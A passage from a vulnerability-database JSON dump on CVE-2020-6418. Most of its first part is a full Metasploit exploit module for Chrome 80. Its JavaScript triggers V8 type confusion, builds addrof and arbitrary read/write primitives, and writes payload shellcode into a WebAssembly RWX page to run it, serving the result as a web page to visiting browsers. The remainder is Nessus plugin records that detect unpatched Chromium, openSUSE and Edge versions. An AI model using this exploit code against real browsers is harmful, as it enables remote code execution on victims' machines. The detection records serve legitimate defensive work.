in order to allocate a region of RWX memory,\r\n which is then replaced with the payload shellcode.\r\n The payload is executed within the sandboxed renderer process, so the browser\r\n must be run with the --no-sandbox option for the payload to work correctly.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Cl\u00e9ment Lecigne', # discovery\r\n 'Istv\u00e1n Kurucsai', # exploit\r\n 'Vignesh S Rao', # exploit\r\n 'timwr', # metasploit copypasta\r\n ],\r\n 'References' => [\r\n ['CVE', '2020-6418'],\r\n ['URL', 'https://bugs.chromium.org/p/chromium/issues/detail?id=1053604'],\r\n ['URL', 'https://blog.exodusintel.com/2020/02/24/a-eulogy-for-patch-gapping'],\r\n ['URL', 'https://ray-cp.github.io/archivers/browser-pwn-cve-2020-6418%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90'],\r\n ],\r\n 'Arch' => [ ARCH_X64 ],\r\n 'DefaultTarget' => 0,\r\n 'Targets' =>\r\n [\r\n ['Windows 10 - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'win'}],\r\n ['macOS - Google Chrome 80.0.3987.87 (64 bit)', {'Platform' => 'osx'}],\r\n ],\r\n 'DisclosureDate' => 'Feb 19 2020'))\r\n register_advanced_options([\r\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information during exploitation\", false]),\r\n ])\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if datastore['DEBUG_EXPLOIT'] && request.uri =~ %r{/print$*}\r\n print_status(\"[*] #{request.body}\")\r\n send_response(cli, '')\r\n return\r\n end\r\n\r\n print_status(\"Sending #{request.uri} to #{request['User-Agent']}\")\r\n escaped_payload = Rex::Text.to_unescape(payload.raw)\r\n jscript = %Q^\r\nvar shellcode = unescape(\"#{escaped_payload}\");\r\n\r\n// HELPER FUNCTIONS\r\nlet conversion_buffer = new ArrayBuffer(8);\r\nlet float_view = new Float64Array(conversion_buffer);\r\nlet int_view = new BigUint64Array(conversion_buffer);\r\nBigInt.prototype.hex = function() {\r\n return '0x' + this.toString(16);\r\n};\r\nBigInt.prototype.i2f = function() {\r\n int_view[0] = this;\r\n return float_view[0];\r\n}\r\nBigInt.prototype.smi2f = function() {\r\n int_view[0] = this << 32n;\r\n return float_view[0];\r\n}\r\nNumber.prototype.f2i = function() {\r\n float_view[0] = this;\r\n return int_view[0];\r\n}\r\nNumber.prototype.f2smi = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.fhw = function() {\r\n float_view[0] = this;\r\n return int_view[0] >> 32n;\r\n}\r\n\r\nNumber.prototype.flw = function() {\r\n float_view[0] = this;\r\n return int_view[0] & BigInt(2**32-1);\r\n}\r\n\r\nNumber.prototype.i2f = function() {\r\n return BigInt(this).i2f();\r\n}\r\nNumber.prototype.smi2f = function() {\r\n return BigInt(this).smi2f();\r\n}\r\n\r\nfunction hex(a) {\r\n return a.toString(16);\r\n}\r\n\r\n//\r\n// EXPLOIT\r\n//\r\n\r\n// the number of holes here determines the OOB write offset\r\nlet vuln = [0.1, ,,,,,,,,,,,,,,,,,,,,,, 6.1, 7.1, 8.1];\r\nvar float_rel; // float array, initially corruption target\r\nvar float_carw; // float array, used for reads/writes within the compressed heap\r\nvar uint64_aarw; // uint64 typed array, used for absolute reads/writes in the entire address space\r\nvar obj_leaker; // used to implement addrof\r\nvuln.pop();\r\nvuln.pop();\r\nvuln.pop();\r\n\r\nfunction empty() {}\r\n\r\nfunction f(nt) {\r\n // The compare operation enforces an effect edge between JSCreate and Array.push, thus introducing the bug\r\n vuln.push(typeof(Reflect.construct(empty, arguments, nt)) === Proxy ? 0.2 : 156842065920.05);\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n}\r\n\r\nlet p = new Proxy(Object, {\r\n get: function() {\r\n vuln[0] = {};\r\n float_rel = [0.2, 1.2, 2.2, 3.2, 4.3];\r\n float_carw = [6.6];\r\n uint64_aarw = new BigUint64Array(4);\r\n obj_leaker = {\r\n a: float_rel,\r\n b: float_rel,\r\n };\r\n\r\n return Object.prototype;\r\n }\r\n});\r\n\r\nfunction main(o) {\r\n for (var i = 0; i < 0x10000; ++i) {};\r\n return f(o);\r\n}\r\n\r\n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel\r\nfunction crel_read4(offset) {\r\n var qw_offset = Math.floor(offset / 2);\r\n if (offset & 1 == 1) {\r\n return float_rel[qw_offset].fhw();\r\n } else {\r\n return float_rel[qw_offset].flw();\r\n }\r\n}\r\n\r\n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel\r\nfunction crel_write4(offset, val) {\r\n var qw_offset = Math.floor(offset / 2);\r\n // we are writing an 8-byte double under the hood\r\n // read out the other half and keep its value\r\n if (offset & 1 == 1) {\r\n temp = float_rel[qw_offset].flw();\r\n new_val = (val << 32n | temp).i2f();\r\n float_rel[qw_offset] = new_val;\r\n } else {\r\n temp = float_rel[qw_offset].fhw();\r\n new_val = (temp << 32n | val).i2f();\r\n float_rel[qw_offset] = new_val;\r\n }\r\n}\r\n\r\nconst float_carw_elements_offset = 0x14;\r\n\r\nfunction cabs_read4(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read4: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].flw();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n\r\n// This function provides arbitrary within read the compressed heap\r\nfunction cabs_read8(caddr) {\r\n elements_addr = caddr - 8n | 1n;\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_read8: ' + hex(float_carw[0].f2i()));\r\n res = float_carw[0].f2i();\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\n// This function provides arbitrary write within the compressed heap\r\nfunction cabs_write4(caddr, val) {\r\n elements_addr = caddr - 8n | 1n;\r\n\r\n temp = cabs_read4(caddr + 4n | 1n);\r\n print('cabs_write4 temp: '+ hex(temp));\r\n\r\n new_val = (temp << 32n | val).i2f();\r\n\r\n crel_write4(float_carw_elements_offset, elements_addr);\r\n print('cabs_write4 prev_val: '+ hex(float_carw[0].f2i()));\r\n\r\n float_carw[0] = new_val;\r\n // TODO restore elements ptr\r\n return res;\r\n}\r\n\r\nconst objleaker_offset = 0x41;\r\nfunction addrof(o) {\r\n obj_leaker.b = o;\r\n addr = crel_read4(objleaker_offset) & BigInt(2**32-2);\r\n obj_leaker.b = {};\r\n return addr;\r\n}\r\n\r\nconst uint64_externalptr_offset = 0x1b; // in 8-bytes\r\n\r\n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array\r\nfunction read8(addr) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n val = uint64_aarw[0];\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array\r\nfunction write8(addr, val) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n uint64_aarw[0] = val;\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n return val;\r\n}\r\n\r\n// Given an array of bigints, this will write all the elements to the address provided as argument\r\nfunction writeShellcode(addr, sc) {\r\n faddr = addr.i2f();\r\n t1 = float_rel[uint64_externalptr_offset];\r\n t2 = float_rel[uint64_externalptr_offset + 1];\r\n float_rel[uint64_externalptr_offset - 1] = 10;\r\n float_rel[uint64_externalptr_offset] = faddr;\r\n float_rel[uint64_externalptr_offset + 1] = 0.0;\r\n\r\n for (var i = 0; i < sc.length; ++i) {\r\n uint64_aarw[i] = sc[i]\r\n }\r\n\r\n float_rel[uint64_externalptr_offset] = t1;\r\n float_rel[uint64_externalptr_offset + 1] = t2;\r\n}\r\n\r\n\r\nfunction get_compressed_rw() {\r\n\r\n for (var i = 0; i < 0x10000; ++i) {empty();}\r\n\r\n main(empty);\r\n main(empty);\r\n\r\n // Function would be jit compiled now.\r\n main(p);\r\n\r\n print(`Corrupted length of float_rel array = ${float_rel.length}`);\r\n}\r\n\r\nfunction get_arw() {\r\n get_compressed_rw();\r\n print('should be 0x2: ' + hex(crel_read4(0x15)));\r\n let previous_elements = crel_read4(0x14);\r\n //print(hex(previous_elements));\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n cabs_write4(previous_elements, 0x66554433n);\r\n //print(hex(cabs_read4(previous_elements)));\r\n //print(hex(cabs_read4(previous_elements + 4n)));\r\n\r\n print('addrof(float_rel): ' + hex(addrof(float_rel)));\r\n uint64_aarw[0] = 0x4142434445464748n;\r\n}\r\n\r\nfunction rce() {\r\n function get_wasm_func() {\r\n var importObject = {\r\n imports: { imported_func: arg => print(arg) }\r\n };\r\n bc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n wasm_code = new Uint8Array(bc);\r\n wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject);\r\n return wasm_mod.exports.exported_func;\r\n }\r\n\r\n let wasm_func = get_wasm_func();\r\n // traverse the JSFunction object chain to find the RWX WebAssembly code page\r\n let wasm_func_addr = addrof(wasm_func);\r\n let sfi = cabs_read4(wasm_func_addr + 12n) - 1n;\r\n print('sfi: ' + hex(sfi));\r\n let WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n;\r\n print('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData));\r\n\r\n let instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n;\r\n print('instance: ' + hex(instance));\r\n\r\n let wasm_rwx_addr = cabs_read8(instance + 0x68n);\r\n print('wasm_rwx_addr: ' + hex(wasm_rwx_addr));\r\n\r\n // write the shellcode to the RWX page\r\n while(shellcode.length % 4 != 0){\r\n shellcode += \"\\u9090\";\r\n }\r\n\r\n let sc = [];\r\n\r\n // convert the shellcode to BigInt\r\n for (let i = 0; i < shellcode.length; i += 4) {\r\n sc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000));\r\n }\r\n\r\n writeShellcode(wasm_rwx_addr,sc);\r\n\r\n print('success');\r\n wasm_func();\r\n}\r\n\r\n\r\nfunction exp() {\r\n get_arw();\r\n rce();\r\n}\r\n\r\nexp();\r\n^\r\n\r\n if datastore['DEBUG_EXPLOIT']\r\n debugjs = %Q^\r\nprint = function(arg) {\r\n var request = new XMLHttpRequest();\r\n request.open(\"POST\", \"/print\", false);\r\n request.send(\"\" + arg);\r\n};\r\n^\r\n jscript = \"#{debugjs}#{jscript}\"\r\n else\r\n jscript.gsub!(/\\/\\/.*$/, '') # strip comments\r\n jscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*);\r\n end\r\n\r\n html = %Q^\r\n<html>\r\n<head>\r\n<script>\r\n#{jscript}\r\n</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})\r\n end\r\n\r\nend", "sourceHref": "https://www.exploit-db.com/download/48186", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-11T15:07:09", "description": "This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed anymore (bsc#1163588).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-259)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-259.NASL", "href": "https://www.tenable.com/plugins/nessus/134157", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-259.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134157);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2020-259)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated to version 80.0.3987.122 (bsc#1164828).\n\nSecurity issues fixed :\n\n - CVE-2020-6418: Fixed a type confusion in V8\n (bsc#1164828).\n\n - CVE-2020-6407: Fixed an OOB memory access in streams\n (bsc#1164828).\n\n - Fixed an integer overflow in ICU (bsc#1164828).\n\nNon-security issues fixed :\n\n - Dropped the sandbox binary as it should not be needed\n anymore (bsc#1163588).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163484\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1163588\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1164828\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromedriver-debuginfo-80.0.3987.122-lp151.2.66.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debuginfo-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"chromium-debugsource-80.0.3987.122-lp151.2.66.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:11", "description": "The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is, therefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-07T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_80_0_361_62.NASL", "href": "https://www.tenable.com/plugins/nessus/138176", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138176);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 80.0.361.62 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge (Chromium) installed on the remote Windows host is prior to 80.0.361.62. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An out-of-bounds memory access error exists in Google Chrome. An unauthenticated, remote attacker can\n exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6407)\n\n - A type confusion error exists in the V8 component of Google Chrome. An unauthenticated, remote attacker\n can exploit this, via a crafted HTML page, to potentially exploit heap corruption. (CVE-2020-6418)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200002\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b4f0f972\");\n # https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ec7f076\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Microsoft Edge (Chromium) 80.0.361.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_edge_chromium_installed.nbin\");\n script_require_keys(\"installed_sw/Microsoft Edge (Chromium)\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\napp_info = vcf::get_app_info(app:'Microsoft Edge (Chromium)', win_local:TRUE);\n\nconstraints = [{ 'fixed_version' : '80.0.361.62' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:06", "description": "The version of Google Chrome installed is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2020-02-26T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "701270.PASL", "href": "https://www.tenable.com/plugins/nnm/701270", "sourceData": "Binary data 701270.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_80_0_3987_122.NASL", "href": 